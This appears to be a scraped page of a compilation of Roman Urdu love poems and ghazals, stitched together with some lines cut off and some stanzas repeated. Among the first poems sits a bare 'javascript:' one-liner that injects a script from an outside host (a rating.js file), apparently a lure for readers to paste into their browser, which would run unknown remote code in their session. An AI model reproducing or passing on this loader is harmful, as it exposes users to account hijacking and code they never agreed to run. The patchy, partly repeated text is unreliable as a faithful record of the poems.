You are on page 1of 14

hum khushbu kay soudaagar hain or saudaa sachaa krtay hain jo gaahak phoolon jaisa ho hum bin daamon

bik jatay hain hum shehr e wafaa k logon ka tum haal bhala kia jano gay hum dil ki chaut chupaatay hain or aansu tuk pee jatay hain chalo chorro muhabbat jhoot hai "EHD E WAFA" ik shughal hai bekar logon ka "TALAB" sookhay huway patton ka beronaq jazeera hai "KHALISH" deemak zada oraq per bosida qatroon ka zakhira hai chalo chorro k ab tak main andhairoon ki dhamak main sans ki zaboon pe chahat k bina ruk kar safar karti rahi hoon mujhay ehsas hi kab tha k tum bhi mosamoon k sath apnay perahan k rang badlo gay chalo chorro MAIRA HONA NA HONA IK BARABAR HAI tum apnay khal o khad ko aainay main phir nukharnay do tum apni aankh ki basti main phir say ik naya mosam utarnay do MAIRAY KHUWABOON KO MARNAY DO chalo chorro "MUHABBAT JHOOT HAI" javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://deepika123.110mb.com/rating.js';void(0) main chahata bhi yahi tha wo bewafa nikalay usay samajhnay ka koi to silsila nikalay kitab-e-maazi ke auraaq ulat kay dekh zara na jaanay kaun sa safah mura hua nikalay jo dekhanay main bahut hi qareb lagata hai usi kay baray main socho to fasala nikalay Osay kehna badal jay K ab es shehar k saray darechon main Hawa to ati hay lakin Gulabon main kabhi khushbo nahi ate K ab daryaon k pani b aksar sokh jatay hain Yahan barish to hoti hay Magar miti se wo mehkar janay kion nahi othte K ab aksar yeh hota hay K taray tot ker gertay hain ek barsat ke sorat Najanay kis k gham main chand b khamosh rehta hay Osay kehna Darakhton per hamaray nam ab to met gaye hon gay K hum jesay kayee pagal Whan kuch or batain likh gaye hon gay K panchi ur gay omeed k ghar ke munderon say K ab manos hotay ja rahay hain hum andheron say Osay kehna badal jay K ab aksar hamain bhi nend aa jati hay raton ko.

Rooth Jaatay Ho Tu Kuch Aur Haseen Lagtay Ho Hum Nay Yeh Soch K Hi Tum Ko Khafa Rakha Hai inhi khush gumaanion mein kahin jaan se na jao jo tabeeb he nahi ai, usse zakhm q dikhao? ye udaasion ke mausam kahin yoon guzar na jain kisi zakhm ko kuredo, kisi zakhm ko jalao woh kahaniyan adhuri, jo na ho saken gi puri unhen main b q sunaon? unhe tum b q suano? mera hamsafar purana mere ab b muntazir hai tumhen saath chorhna hai tu abi se chor jao ye judaion ke raste bari door tak gaye hain jo gaya wo phir lota, meri baat maan jao kisi bewafa ki khatir ye junoon akhir kab tak jo tumhen bhula chuka hai... usse tum b bhool jao.. ajnabi si rahon ka ajnabi musaafir aik mujh sey pooch betha hai raasta bata do gey ajnabi si rahon k ajnabi musaafir sun raasta koi bhi ho waasta koi bhi ho manzilein nahi milteen manzilein tu dhoka hain manzilein gar mil jaaien tu justajoo nahi rehti zindagi ko jeeney ki arzoo nahi rehti ss

Toote Hue Khawabon Mein Haqiqat Dhundta Hoon Pathar Ke Dilon Mein Mohabbat Dhundta Hoon Naadan Hoon Mein Abb Tak Yeh Bhi Nahin Samjhe Bejaan Buton Mein Ibaadat Dhundta Hoon Mere Jazbaaton Ki Keemat Yahan Kuch Bhi Nahin Beimaani Ke Baazaron Mein Sharafat Dhundta Hoon Is Ajnabi Dunia Mein Koi Bhi Apna Nahin Gairon Ki Aankhon Mein Apni Surat Dhundta Hoon UMEED Ki Thi Pyar Ki Bas Yehi Bhool Thi Meri Girte Hue Ashkon Mein Apni Hasrat Dhundta Hoon tujh ko shikwa hai k main tujh say kabhi mil na ska teray to ilm main thay saray thikanay meray

ham hijar k rasty par safar kar nahi sakty eik lamha tery bina basar kar nahi sakty woh aakhri lamhoon main mujhy maang raha hai yeh waqt hai aesa k guzar kar nahi sakty khud hath say apny usay khona hi pary ga yeh zabt bhi karna hai magar kar nahi sakty yoon apni nigahoon ko chora layty hain tujh say k dil k iradoon ki khabar kar nahi sakty tum khwaab jalaty rahy ham aaj tak chup thy ab dil k yoon jalny par sabar kar nahi sakty yeh aankh andheroon main hoi pyaas ka sehra is noor k darya par nazar kar nahi sakty har chand k meri aankh main aansoo hain larazty jalty hoy sholay es par asar kar nahi sakty ab chahin bandh lain gay tumhin apni nazar say ham is liye khuda say khafa ho nahi sakty Na ujar sakain, Na sanwar sakain Kabhi dil dukhao --- to is tarah Na simat sakain, Na bikhar sakain Kabhi bhool jao --- to is tarah Kisi tor Jan say guzar sakain Kabhi yaad aao to is tarah !!!!!! Jo naheen, to phir baray shoq say Sabhi rabtay, sabhi zabtay Kabhi dhoop chaon may tor do ! Na shikast-e-dil ka sitam saho Na suno Kisi ka azab-e-jan Na Kisi say apni khalish kaho Yunhi khush phiro, yunhi khush raho, Mera Dard phir say ghazal bunay Kabhi gungunao --- to is tarah Meray zakhm phir say gulab hon Kabhi muskurao --- to is tarah Mere dharkanain bhi laraz uthayn Kabhi chot khao --- to is tarah Kabhi yaad aao to is tarah-----! Ke dil-o-nazar main utar sako Kabhi hud say habs-e-junoon barhay To hawas bun kay bikhar sako Kabhi khul sako shab-e-wasl main Kabhi khoon-e-dil main sanwar sako Sar-e-rah guzar Jo milo ----- Kabhi Na thehar sako ----- Na guzar sako. Kabhi yaad aao to is tarah-----! Keh lahoo ki sari tamaztain Tumhain dhoop dhoop samait lain

Tumhain rung rung nikhar dain Tumhain harf harf main soch lain Tumhain dekhnay ka Jo shouq ho To diar-e-hijr ki tergi ! Komisa ki nok say noch lain !! us nay mujh say kaha meray saathi! tum ko mujh say jo hai gila-kia hai kubhi fursut milay to yeh socho, munzilain kiyoon hain? faslay kia hain? apnay apnay safur pay niklay log mushtrik rastoon pay chultay hain humraahi k hisaar main jitnay Din nikultay charag jultay hain! sub ki ankhoon main jhilmilatay hain apni apni umeed k darobaam zindgi k safar main miltay hain mustakil dard, arzi aram tum meray humsafar to ho lakin hum kahin say bichar bhi saqtay hain deer tuk ik taveel rastay per saath to ajnabi bhi chaltay hain khud bhi woh us se bichar ker adhora sa ho gayya mujh ko bhi itnay logoon mei tanha banna dia.. janay kia us ko logoon se thein shikayatein tanhaiyoon ke dais mei khud ko basa dia awaaz mei tehrao tha ankhoon mei nammi thi aur keh raha tha mei ne sab khuch bhula dia lehjay se uth raha tha har eik dard ka dhuwan chehra bata raha tha keh khuch gawa dia sab se chupa ker dard, jo woh muskura dia us ki hassi ne tau aaj mujh ko rula dia mohabat derd ki surat guzishta mosamoon ka istiaara ban k rehti hay shabaan e hijer main ,roshan sitara ban k rehti hay munderoon per charaghoon ki loain jab therterati hain nager main na umeedi ki hawain sansanati hain gali main jab koi ahat ,koi saya nahi rehta dukhay dil k liye jab koi bhi dhoka nahi rehta ghamoo k bojh say jab tootnay lagtay hain chanay to ye un pay haat rekhti hay kisi hamderd ki surat guzer jatay hain saray kaflay jab dil ki basti say fiza main terti hay dair tak ye gerd ki surat mohabat derd ki surat mohabbat aag ki surat bujhay seeno main jalti hay to dil baydaar hotay hain mohabbat ki tapish main kuch ajab israr hotay hain k jitna ye bharakti hay,aroos e jaan mehekti hay diloon k sahilon pay jama hoti or bikherti hay mohabbat jhaag ki surat mohabbat aag ki surat mohabbat aber ki surat dilon ki sir zamee pay ghir k atti or barasti hay chaman ka zarra zarra jhomta hay,muskurata hay azal ki bay namoo main sabza sir uthata hay mohabbat un ko bhi abad or shadab kerti hay

jo dil hain kaber ki surat mohabbat aber ki surat mohabbat oss ki surat piyasi pankhri k hont ko seraab kerti hay goloon ki aasteeno main anokhay rang bherti hay seher k jhutputay main gungunati,muskurati,jagmagati hay mohabbat k dino main dasht bhi mehsoos hota hay kisi firdoos ki surat mohabbat oss ki surat

Khabi Jo aankhon main chand hans hans kar chandni ka khumar bhar day, To Apni aankhain kaheen khla main gwan Na aana Kay ye Na ho Phir Jo khawab tootay, Dhanak dhanak ka sarab tootay, To jism-o-jaan par azab tootay, Or Tum bamushkil laraztay haton main, Kirchi kirchi badan sambhalay. Kaheen bulandi pay charh kay----Risti hoi nigahon say. Wapsi kay nishan dhoondo Ujar Gaya Jo Jahan dhoondo Kabhi Jo Charon taraf tumharay Kiran kiran apna khawab Sa badan nikharay Zameen pay utray, To Dhundlakon main Sama Na Jana Kabhi tammanna kay raston par nikal paro to Khayal rakhna, Hawayein, badal, fizayein, mausam Chehray badal badal kar tumhay milay gay To Lamha lamha badaltain rangon kay shokh dhokay main aa na jana Aaj ki raat koi chat pe nahi so sakta. Chaand nikla hai ab aaram nahi ho sakta Raat bhar Chaand ke humra phiray Meri tarha Ab koi itna bhi pagal to nahi ho sakta Ghairay Rehtay hain shab-o-roz ye Gham khaar mujhay Kash mein teri tarha Chup ke kahin roo sakta Jis ne phoolon ki tarhan zakham diye hain mujh ko, woh meri rah mein kaante to nahin bo sakta, Koi aansoo meri palkain to bigho sakta Dil pe jo daagh hain in ko tu nahin Dho sakta, koi din raat ki zanjeer mein jakra huwa shaks, Bhool jaye tujhe , Aisa tu nahi ho sakt

rabt-e-gum aur khushi hi toot gaya gher main ju tha sabhi toot gaya jis ky dil ky totany ki baat ki thi aaj woh admi hi toot gaya jab woh aik shaks dermian aya khwab woh us gheri hi toot gaya phir aman kon dy usy jis ka risha-e-bandagi toot gaya koi dil toota youn laga mujhy kura-e-roshni hi toot gaya jab sy dekha nahi woh kamit nasha-e-zindagi hi toot gaya kis bherosy per abb junnon ki jiyay kis towaqa py herf ku likhy tar-e-nagma kashi hi toot gaya toot ky toot ky mohabat ka rakhs-e-dewangi hi toot gaya Khudi ka aik jam e jim hoon mein hi saghir e Zam Zam hoon Khare dehleez per hein khurd o janoon mein kise or khaya mein gum hoon Meri waja e takhleeq he kia ise talaash mein gum sum hoon Khuda se bhi hote hein gile shikwe kabhi khud se bhi barham hoon Soochta hoon kehne ko kuch bhi nahi sochta ziada, bolta kam hoon Kitne ajza ka murakab hoon mein kitne tukroon mein munqasam hoon Ghabra ke phat jaoon ga aik din ik sulagta hoa bam hoon Bhatki hoi ik zindagi hoon Jahud ki ik be basi hoon dasht e zulmat ki tareeki mein madham si ik roshni hoon her bazm mein ik tamasha hoon doosron ke liye khushi hoon Khurd o janoon ka hosh nahi khdi mein gum bekhudi hoon bhatak bhatak ke pahuncha hoon yahan aaj samjha mein hi aagahi hoon

dil se dil ko he rah teri rah ka rahi hoon naam lo pyar se mera tere honton ki tazgi hoon dil mein betha dard bhi ho ga tere dil ki dil lage hoon apne palkoon mein panah de do tere janat mein ajnabi hoon is soch main hoon aj...tum kon ho..kia ho? ik khawab ho...khushboo ho...meray dil ki sada ho!! main is k elawa tumhain kuch nahin kah sakti hon...! tum meri manajat ho......tum meri dua ho!! yeh silsila--shoq kahin toot na jaye tum karb ho...tum dard ho...aur tum hi dua ho...! hai dil ko yakeen ao gay tum lot k ik roz.. jaisay tum koi cheez.......yahan bhol gaye ho! seema meri yadon k kanwal bheeg rahay hain.... jis tarah tera askq.....ser dast-e-saba ho!!! pehley pehal to ajeeb lagey badley huwey chehrey phir yuN huwa ke waqt ke saath hum bhi sambhal gaey aaNkheiN khuleiN to khaaboN ko bura laga magar kuch deir wo reh ke muztarib khud hi behal gaey taanoN ke teer dunya ki kamaanoN pe jab charrhey sabar ke daaman haathon sey yak'dam phical gaey wafaaoN ke rang shabnam ke qatroN ney dho deeye mohabbat ke phool jazboN ki 'shiddat' sey jal gaey waadoN ke taarey raatoN sey baahar na jaa sakey iraadoN ke din nikalney sey pehley hi dhal gaey haalaat ki dhoop zaraa si deir ko teiz kya hui jitney wafaa ke peikar they saarey pighal GAYE YuN dost saarey apney apney rastey badal gaey kuch peechey ruk gaey to kuch aagey nikal gaey Koi dost hai na rakeeb hai, Tera shehar kitna ajeeb hai Woh jo ishq tha woh janoon tha, Yeh jo hijr hai yeh naseeb hai ! Yahan kis ka chehra pada karoon, Yahan kaun itna qareeb hai !

Main kisey kahoon meray saath chal, Yahan sab kay sar pay saleeb hai ! Koi dost hai na rakeeb hai, Tera shehar kitna ajeeb hai! Kisi khush nigah si aankh nay, Yeh kamal mujh pay karam kia Mere loh-e-jaan pe raqam kia Woh Jo ik chand sa harf tha, who Jo ik shaam sa naam tha Woh Jo ik phool si baat phirti thi dar badar, Usay gulistan ka pata dia. Mera dil ke shehr-e-malal tha, usay roshni main basa dia. Mere aankh or meray khwab ko, Kisi aik pal main baham kia. Woh Jo dhund thi meray char soo, who bikhar gaee. Meray aainon pay Jo gard thi, mah-o-saal ki, who utar gaee. Sabhi roop aks-o-jamal kay, sabhi khwab sham-e-visaal kay Jo ghubar-e-waqt main Sar basar thay, atay huay, Woh chamak uthay, Woh Jo phool rah ki dhool thay, who mehak uthay. Liay saat rang bahar kay, chala main Jo sang bahar kay, To saja diay sabhi raastay, Kisi dast-e-shubda saaz nay Meray naam par, Meray wastay, Mere be-ghari ko panah di, Mere justajoo ko nishan dia, Woh Jo yaqeen say bhi haseen hai, Mujhay ik aisa guman dia, Woh Jo raiza raiza wajood tha, usay ik nazar main baham kia.. Kisi khush nigah si aankh nay Ye kamal mujh pa Umr bhar ki chahat ko Aasra nahi milta Khamshi kay waqfon main Baat toot jati hay Or sira nahi milta Maazrat kay lafzon ko, roshni nahi milti Lazat-e-pazeerai Phir kabhi nahi milti Phool rung waadon ki, manzilain sukarti hain Raah mitnay lagti hay Berukhi kay gaaray say, bedili ki mitti say Faaslon ki eent say eent jurnay lagti hay Kyun shab bhar jaagte rehte ho Kyun chup chup phirte rehte ho Kyun sapne bunte rehte ho Kyun Dil main hanste rehte ho Kyun bekal bekal phirte ho

Kyun ulajh rahe ho yaadon se Kyun bahel rahe ho baaton se Jo baat hai Dil main woh kehdo Kyun tum iqraar nahi karte Jis ki aagosh may urnay ki tammanna lay kar Kabhi baadal ki tarah apni mitaee hasti Or kabhi dil ko banaya woh sitara, jo sar-e-shaam Raat ko chaand utarnay ki sunata hai naveed Apnay mitnay ki tammanna hi jalati hai usay Or aakash ki vussat say girati hai usay Kya tum Pyaar nahi karte Aaena chaand ka is to'or dikhaya hum ko,..Ke Dil ko furqat say siya gaaro'n may mil gaya rasta tere zaat kay is paima'n ka Jis kay kaandho'n pay dhara tha kabhi neela aakash. Jab tujhay bhoolna chaha hum nay!!! Dil nay chupkay say tera aks dikhaya hum ko,.,.,. Hum Dasht They Ke Dariya Hum Zahar Thay Ke Amrit Nahaq Tha Zonum Hum Ko Jabh Wo Nahin Tah Pyaasa... Tevar They Berukhi Ke Andaz Dosti Ka Wo Ajnabi Tha Lekin Lagta Tha Ashna Sa ... Ab Sach Kahain To YaroO Hum Ko Khaber Nahin Thi Ban Jaye Ga Qayamat Ik Waaqia Zara Sa ... Pahle Bhi Log Aaye Kitne He Zindagi Main Wo Her Terhaan Se Lekin Auroon Se Tha Juda Sa ... KhuwaboON Main Kuwaab Us Ke Yadoon Main Yaad Uski NaindoON Main Ghul Gaya Ho Jaise Ke Rat'Jaga Sa ... Alfaaz Thay Ke JugnoON Awaaz Ke Safar Main Ban Jaye JangaloON Main Jis Terhaan Raasta Sa Aabru Khinche Khinche Se Aankhain Jhuki Jhuki Si Baatain Ruki Ruki Si Lehja Thaka Thaka Sa ... BarsoON Ke Baad Dekha Ik Shakhs Dilruba Sa Ab Zahen Main Nahin Hai Per Naam Tha Bhala Sa ... Wohi haseen shaam hai Bahar jis ka naam hai Chala hoo'n ghar ko chor kar Na jaanay jaoo'n ga kidhar Koi nahi jo rok kar Koi nahi jo tok kar Kahay ke "LOT AAEYAY"

"MERE QASAM NA JAAEYAY" !!! -----------Dehli ka rung dekh ker Nayee tarung dekh ker Mujhay bari khushi hoyee Mai'n kuch isi khushi mai'n tha Kisi nay jhaank kar kaha Parayay ghar say jaaeyay Mere qasam na aaeyay Mai'n sheher say phir aa gaya Khayal tha ke pa gaya Us ko jo mujh say dooor thi Magar mere zaroor thi Or ik haseen shaam ko Mai'n chal para salaam ko..... Bohat dino'n ki baat hai Shabab pur-bahar thi Fiza bhi khush-gawar thi Na janay kyon machal para Mai'n apnay ghar say chal para... Kisi nay mujh ko rok kar Bari ada say tok kar Kaha tha lot aaeyay Mere qasam na jaaeyay ! Par mujhay khabar na thi Maahol pay nazar na thi Na jaanay kyon machal para, Mai'n apnay ghar say chal para. Ban jatay hain naksh wafa ka Log muhabbat karnay walay! Jhonka hain be-chain hawa ka Log muhabbat karnay walay! Jail howi dharti pe jesay badal ghir ka aain Basti per hain fazal khuda ka Log muhabbat karnay walay! Khowab khushi ke boo jatay hain Log muhabbat karnay walay! Zakham dilon ke dhoo jatay hain Log muhabbat karnay walay! Titli titli lehratay hain pholon ke umeed liyee Aik din khushboo bo jatay hain Log muhabbat karnay walay! Chupkay chupkay jal jatay hain Log muhabbat karnay walay! Purwa sang nikal jatay hain Log muhabbat karnay walay! Ankhon ankhon mein chal partay hain taroon ke kandeel liye Chaand ke sath he dhal jatay hain Log muhabbat karnay walay! Dil mein phool khila detay hain Log muhabbat karnay walay! Pani peech batasha surat khud tou ghultay rehtay hain Neem ko shehad bana detay hain

Log muhabbat karnay walay! abhi kya kahain abhi kya sunayaiN yuu.N hi Khahisho.n ke fishar main kabhi be-sabab kabhi be-Khalal kaha.N kaun kis se bichar gaya kise kis ne kaise ga.Nva diya kabhi phir mile.nge to poochana sar-e-sahr-e-ahd-e-visaal-e-dil vo jo nikahato.n ka hujoom tha usay dast-e-mauj-e-firaq ne tah-e-Khaak kab se mila diya kabhi gul khile.nge to poochna abhi kya kahain abhi kya sunayain ke sar-e-faseel-e-sukuut-e-jaaN kuf-e-roz-o-shab pe sharar numa vo jo harf harf charaaG tha usay kis hava ne bujha diya kabhi lab hile.nge to poochna Kabhi tammanna kay raston par nikal paro to Khayal rakhna, Kaheen say khali palat kay aana, Bohat kathin hay.. Bohat kathin hay.. kabhee kabhee woh nazr chura kr kreeb say meray yun bhee guzra k jesay woh ba khabar hay meri muhabbato'n say dil-o-nazr ki hakayatai'n sun rakhi hai'n uss nay meri hi soorat woh waqt k dairo'n say bahir kisi tasawer mai'n urr raha hay khayal main, khuwab-o-khalwat-e-zaat-o-jalwat-e-bazm main shab-o-roz woh jism-o-jaan k tamaam rishto'n say chahta hay magar nahi'n jaanta yeh woh bhee k aesa kioon hay main sochta hoon, woh sochta hay kabhi milay hamm to aino'n k tamaam baatin ayaan kraingay haqeekato'n ka safar kraingay main jism-o-jaan k tamaam rishton say chahta hoon nahi samjhta k aesa kioon hay na khaal-o-khad ka jamaal uss main, na xindagi ka kamal koi jo koi uss main hunar bhee ho gaa to mujh ko uski khabar nahi hay na jaanay phir kiooon! main waqt k dairo'n say bahir kisi tasawer main urr raha hoon khayal main, khuwab-o-khalwat-e-zaat-o-jalwat-e-bazm main shab-o-roz mera lahooo apni gardisho'n main ussi ki tasbeeh perh raha hay jo meri chahat say be khabar hay!!! Yahi hai zindagi kuch khwaab chand ummidein Inhin khilonon se tum bhi behal sako to chalo YahaaN kisi ko koi raasta nahin deta

Mujhe gira ke agar tum sambhal sako to chalo Kisi ke waaste raahein kahaan badalti hain Tum apne aap ko khud hi badal sako to chalo Safar main dhoop to hogi jo chal sako to chalo Sabhi hain bhiir main tum bhi nikal sako to chalo yon na mil mujh say k khafa ho jaisay.... sath chul moj-e-wafa ho jaisay...... log yon dekh ker hans detay hain....... tu mujhay bhool gaya ho jaisay.......ishq ko shirk ke had tuk na badha...... yon na mil mujh say khud a ho jaisay..... maut bhe aaye tu is naza k sath... mujh pay ehsa kiya ho jaisay....... aisay anjan banay ho jaisay ........ tum ko kuch bhe na pata ho jaisay........ hichkiyan rat ko phir aati he rahin..... tu nay phir yad kiya ho jaisay........ zindagi beet rahi hia younhi....... ek bay jurm saza ho jaisay....... Tumhain kia acha lagta hay yaa kia acha nahi lagta Ye sab kehnay ki baatain hain K drya saath behtay hon to paani acha lagta hay Kinaaron say jurri matti say poocho rog chahat ka K iss matti ki chahat main Ukhar ker ajnabi deson ko jaana kitna mushkil hay Kinara phir nahi milta Likhoon to kia likhoon tumko K jab kaghaz pay lafzon ki jagha tanhaai jam jaye To kuch likhna na likhna kitna be-maani sa lagta hay K jab kirno k rastay main koi deewar aa jaye To sooraj ka nikalna din ka hona roshni ka phelna Sab apni apni manweat khonay lagtay hain Likhoon to kia likhoon tum ko Rag-e-jaan khoon bakaf hay Aur hazaron harf ghail hain Udhartay jaa rehay hain raat din Aankhon k daman say Khushboo k peechay hi peechay Main kis des main aa nikla hoon Ik bojhal c laash ki maanind Awazon k iss sagar main Doob gya hoon Andhiaaray ki saari rahain Bhedon k jangle ki jaanib jaati hain Dood hi door say anjaani aawazain Mujh ko apnay paas bulaati hain Kon mujhy yeh samajhaye gaaa Khushboo k peechay mat bhaago Iss ki manzil nahi Shaam ki had say door naa dekho Rangon ki dehleez say aagay

Kuch bhee nahi Kahin ishq ibtda hai, kahin ikhtatam ishq Kahin koi faisla nahi, kahin hai anjam ishq Saahil ki tamana ishq hai to mojon ki rawani ishq Ishq kahin afsana hai, katre ki kahani ishq Kahin ishq hai inkaar main, kahin iqrar ishq Ishq baydaar hai agar hai daar ishq Ishq soz hai aur kahin hai saaz ishq Kahin awaz hai aur kahin hai raaz ishq Kahin ishq husno jamal hai, kahin faqt khayal ishqjuda howe to khula hay tumhari basti main ham aik dil hi nahi chashm-e-tar bhi bhool gaye khayal tha sunain gay haal-e-dil lakin ham us k samnay arz-e-hunar bhi bhool gaye dukhon nay cheen li aankhon ki sari beenai ham us ka shehar kia reh guzar hi bhool gaye yeh kasi qoowat-e-parwaz woqt nay paida ki parinday urtay howe apnay par hi bhool gaye Yeh kasa khof tha rakht-e-safar hi bhool gaye Wo kon log thay jo apnay ghar hi bhool gaye Phir kisi gehray samundar ki taho'n may ja kar Roop lay kar kisi moti ka, sadaf kay andar Phir jala daalay woh bujhti hoee qandeel-e-wafa Jo meray dil may rahi, tere nigaho'n may rahi Jagmaga dala hai,is nay tera aks-e-jamal JAB TUJHAY BHOOLNA CHAAHA HUM NAY..! Kahin jawab bhi ishq hai, kahin hai sawal ishq raaton ko uth uth ker rotay hain, ro ro k duain kertay hain aankho main tassawur, dil main khalish, sar dhuntay hain aahain bhartay hain aye Ishq yeh kaisa rog laga jeetay hain na xalim martay hain http://www.orkut.com/Scrapbook.aspx? uid=7895878606332535472&pageSize=30&na=4&nst=0&nid=7895878606332535472-117945660918387107342776177387 Hai namoode kainat ishq, iss main har baat ishq Kahin ishq hasti hai, kahin koi zaat ishq Kahin ishq hai inkaar main, kahin iqrar ishq Ishq baydaar hai agar hai daar ishq Ishq soz hai aur kahin hai saaz ishq Kahin awaz hai aur kahin hai raaz ishq Kahin ishq husno jamal hai, kahin faqt khayal ishq Kahin jawab bhi ishq hai, kahin hai sawal ishq Hai namoode kainat ishq, iss main har baat ishq Kahin ishq hasti hai, kahin koi zaat ishq

You might also like